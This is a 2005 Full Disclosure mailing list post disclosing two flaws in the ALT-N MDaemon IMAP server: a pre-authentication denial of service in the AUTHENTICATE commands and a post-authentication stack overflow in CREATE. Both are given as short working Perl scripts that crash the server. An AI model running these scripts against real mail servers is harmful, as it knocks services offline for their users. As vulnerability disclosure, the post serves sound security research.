Full Disclosure mailing list archives
ALT-N MDaemon multiple vulnerabilities
From: kcope <kingcope () gmx net>
Date: Mon, 18 Jul 2005 20:24:09 +0200
Hello this is kcope,there are two remote vulnerabilities in the latest ALT-N MDaemon imapd product i don't know if any of them is exploitable .. the stack based buffer overflow
seems promising, but it's not preauth so i didn't investigate it further. 1.) Remote denial of service in AUTHENTICATE LOGIN and AUTHENTICATE CRAM-MD52.) Remote stack based buffer overflow after authentication in the imap CREATE statement
---snip--- ### ### MDAEMON remote DoS exploit by kcope ### looks like thereĀ“s a fault in the base64 decoder ### works also for AUTHENTICATE LOGIN ### use IO::Socket::INET; $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => '143', Proto => 'tcp'); $a = "q" x 1000; print $sock "a001 AUTHENTICATE CRAM-MD5\r\n"; print $sock $a,"\r\n"; print $sock $a,"\r\n"; while (<$sock>) {print $_; }
---snip--- ---snip--- ### MDAEMON stack based buffer overflow ### Remote DoS exploit by kcope use IO::Socket::INET; $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => '143', Proto => 'tcp'); $a = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\\" x 10; print $sock "a001 LOGIN username password\r\n"; print $sock "a001 CREATE $a\r\n"; while (<$sock>) {print $_; }
---snip--- -kcope _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- ALT-N MDaemon multiple vulnerabilities kcope (Jul 18)